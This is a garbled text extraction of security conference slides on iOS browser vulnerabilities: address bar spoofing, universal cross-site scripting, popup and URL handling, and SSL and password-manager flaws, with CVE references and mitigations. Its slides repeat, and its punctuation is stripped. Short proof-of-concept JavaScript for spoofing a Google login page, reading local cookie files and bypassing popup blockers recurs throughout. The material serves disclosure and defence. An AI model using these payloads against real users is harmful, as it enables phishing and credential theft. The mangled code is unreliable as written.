bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 12: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/12.jpg)
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 13: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/13.jpg)
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
